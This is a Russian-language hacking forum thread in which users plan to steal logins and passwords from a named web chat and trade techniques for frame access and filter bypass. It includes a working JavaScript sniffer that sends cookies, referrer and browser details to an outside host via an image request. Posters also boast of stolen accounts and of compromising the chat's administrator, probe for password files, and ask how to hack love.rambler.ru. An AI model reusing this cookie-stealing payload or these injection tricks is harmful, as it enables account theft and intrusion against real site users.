|
В чужие фреймы умеет кто лазить?
Здрям, Поцики!!
Кто знает, как из фрейма вытянуть инфу? Ну когда жертва открывает соседнее окно со скриптом (как написать???) Фрейма -4, один из них пишу-)) Фрейм: <form action="http://HACKED-CHAT.ru/cgi-bin/chat/chat.cgi" name="post" method="POST" > <input type="hidden" name="action" value="post"> <input type="hidden" name="password" value="1234"> <input type="hidden" name="login" value="Vasja-Lamer"> <input type="text" size="40" name="post" MAXLENGTH=400 > <input type="submit" value="Сказать" > <input type="submit" name=act value="Сделать" > </form> <script language="javascript"> document.post.post.focus(); </script><br><br><br><br> Знает кто???? Дмитро http://smaylik.by.ru/i/773.gif |
Дмитро! чувак давай поконкретней!
|
Fr1k,
Смысл такой: В чате - 4 фрейма, пароль и логин везде прописывается открыто,и в строке браузера пишется: тра-та-та/cgi-bin/chat.cgi&login=Vasya&password=123
Но сниф закинуть непосредственно в тела чата не получается,там СУПЕР-фильтр, мысль такая: Жертва открывает отдельное окно, в котором должен быть скрипт,либо вытягивающий PASSW из любого фрейма, либо Внедряющийся в окно чата, ну там путём: FRAMESET,или чёто в этом духе..ну а дальше, на мыло или путём get.. Я с этим ранее не работал, по этому имею плохое представление о обращениях фреймов друг к другу. Но точно знаю,что можно-) Вот эти записи типо top.frames[3].document.forms[0] я слабо понимаю. Раньше всегда сам разбирался,но здесь помощь нужна, а то я в тупике . Тфу блин, так если в строке браузера пропис-ся пароль,так его ж и надо снифом глушить, но тогда как его всунуть??? (но строка в браузере меняется каждые 5 сек. и становится без пароля (../online.cgi) Блин,посоветуйте чёнть конкретное?????? :rolleyes: Dmitro http://smiliki.fromru.com/img/335.gif |
У меня есть кое-какая мысля по этому поводу ...
Скажи название фрейма ... |
По идее невозможно из загруженной html-странички получить доступ к другой страничке, которая открыта в данный момент ... Но, допустим, открыто окно и там фрейм с именем password и если использовать метод
Код:
window.open("http://antichat.ru", "password")У меня возникли сложности с извлечением содержимого фрейма password ... Я хотел, чтобы фрейм загрузился в окно, которое размещено на сайте, куда мы заманим юзера и это все загруженное передалось на сниффер ... |
Че Гевара,
Тот, что написал, - "POST" , но блин, там и "MAIN" , и др. есть... А вообще PASSWORD и LOGIN в строке браузера: ...../chat.cgi&login=VASYA&password=123
Фильтр стоит Приличный, как же в тело чата сниф засунуть???? С помощью FRAMESET , ну или вытянуть инфу путём get, или там на мыло... ??? Короче лучше раз увидеть, чем сто раз... Могу на мыло выслать pass и login, чтоб войти, а то там регистрацию запретили .. А логины - не вопрос... я их понапиз...л прилично, тока боюсь, не надолго, периодически всех!!! киляют. Я там достал всех уже своим вторжением-)) Этот чат использую как учебное пособие для взломов. http://smiliki.fromru.com/img/374.gif |
Код:
window.open("http://antichat.ru", "post")Подумаю насчет передачи PASSWORD и LOGIN на сниффер ... |
Че Гевара
У меня один последний ник остался....
Вот такие там СССобаки!!! Грех не взломать,да? Но терь походу придётся базу паролей искать,но у меня и с этим тоже не очень... пробовал всякие ../../htpaswd и всякую фигню, но пока безуспешно(( ЛЮДИ!!! Советуйте!!! Дмитро http://smiliki.fromru.com/img/239.gif |
window.open("http........", "post")
это всё я давно там пробовал, фигня всё это... максимум грузится страница и отображается во всё окно, а надо только в фрейм, а лучше чтоб в невидимый фрейм, снифер туда никак... НО!!! когда я взламывал там Админа, то я и снифы вставлял прямо в тело чата, и невидимые ссылки onmouseover на сниф и т.д. там же и во фреймы кидал чё мне надо.. А ВОТ не имея прав админа Пытаюсь из соседнего окна что то вставить. Блин да можно так делать, я просто уже всё позабыл-)) НУ КТОНТЬ ЗНАЕТ ??? :rolleyes: :rolleyes: :rolleyes: http://smaylik.by.ru/i/759.gif |
кинь мне в аську адресс и логин с паролем чата
|
ВНИМАНИЕ!!!!!
В том чате "Борнео" разрешена регистрация !
Если кто не желает помучить бедный дырявый чат не заходите туда, а то у вас это может получиться ... Здесь ссылка Borneo.ru хи-хи-хи... :D описание дырок на гл. странице (статья про взлом чатов и в пример конкретный...) http://smaylik.by.ru/i/750.gif |
Немного от темы...
Жизненно важный вопрос!!
Если ктонть знает, скажите, в обычном html документе можно скрипт написать, узнающий реферера, или я опять страдаю иллюзиями о лёгких взломах?????? УБЕДИТЕЛЬНО ПРОШУ ответить тех, кто знает, хотя бы в принципе??? :D :D http://smaylik.by.ru/i/739.gif |
Реферера ? Для текущего документа можно узнать ...
|
Вопрос наверное к Algol
Вообщем то попал на один чат, построение впринципе уже знакомое,но! уж через-чур фильтры сильные: ничё не пропускает,кроме как через ник,
и то немного.. короче: ...... <a href="#end" onclick="return Write('НИК, ')"> <b>НИК:</b></a><font color=C0C0C0> Сообщение</font> ...... в нике пропускаются : & # % ' > / \ ; единственное,что смог - эт на событие onclick, но не могу перекрыть двойную кавычку onclick, можно ли что то сделать,хотя бы вывести на onmouseover ????? У меня нифика не получилось.... Да,кстати только в нике! а в репликах на всё фильтр. Помоги, плиииз ? http://smaylik.by.ru/i/580.gif |
пам-парам-пам-пам-пам-парам-парарарарам-парам-пам-пам...
походу здесь нифика не видно и никто мне не ответит.... тогда надо тему кильнуть........... http://smaylik.by.ru/i/123.gif |
ХОП-ХЕЙ
КРУТО!!! Написал скрипт, который всё же вытягивает инфу о рефере, и не тока... И всё в HTML..
Спасибо за вдохновление Кубинскому приятелю че гевере :)) Хоть algol и говорил, что нельзя... Ну вообщем он будя всё выдавать о юзере. Может кому тоже нужно будет, так я не жадный (Продвинутым можно не читать, а то опять скажите,что эт уж давно известно или чёнть в этом духе... ) Ещё одно изобретение (можно узнать и не тока для текущего HTML но и... ) Но простите, пока все чаты не переломаю фиг скажу... ХА! -:) <Script language="JavaScript"> if(navigator.userAgent.indexOf('IRIX') != -1) { var OpSys = "Irix"; } else if((navigator.userAgent.indexOf('Win') != -1) && (navigator.userAgent.indexOf('95') != -1)) { var OpSys = "Windows 95"; } else if(navigator.userAgent.indexOf('Win') != -1) { var OpSys = "Windows 3.1 or NT"; } else if(navigator.userAgent.indexOf('Mac') != -1) { var OpSys = "Macintosh"; } else { var OpSys = "Other"; }date= new Date();zone= date.getTimezoneOffset();gmt= date.toGMTString();bname=navigator.appName;bversio n=navigator.appVersion;if (bname=="Netscape"){bplugins=navigator.plugins.len gth;}if (bname=="Netscape"){address=java.net.InetAddress.g etLocalHost(); ip=address.getHostAddress();}loc=location.href;mod i=document.lastModified;refer=document.referrer;if (bname=="Netscape"){var tools=java.awt.Toolkit.getDefaultToolkit();var size=tools.getScreenSize();w=size.width;h=size.hei ght;}</Script><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+refer+loc+OpSys+modi+date+bname+bversion+d ocument.cookie;</script> Вообще то я его в одну строчку делал, так шо проверять не буду чё там после вставки стало.. да и немного выдернул из него (секрет) А идею мне счётчики статистик подкинули, они много чего могут.. Короче вставляю его в инфу (В чате) через юзерагента, как я писал в статье для новичков, и в логах сникерса смотрим........ Так шо версия для новичков, но и то харшо... А другие данные - эт конеШна секрет. тфу блин, лишнего урезал.. если надо скрин сайз, то ещё к сникерсу +h и +w.. Да, кстати, чё, кто-то GOOGLE заснифирил??? я когда логи смотрел, видел там про него... Эт круто! Молодцы! ♣ -Dmitro- ♣ http://smaylik.by.ru/i/474.gif |
http://smiliki.fromru.com/img/239.gif
КтоНьть знает как ломануть love.rambler.ru ?? там посетителей неибаца, можно свой сайт раскрутить прилично... :) :) |
love.rambler.ru
Цитата:
|
| Время: 15:27 |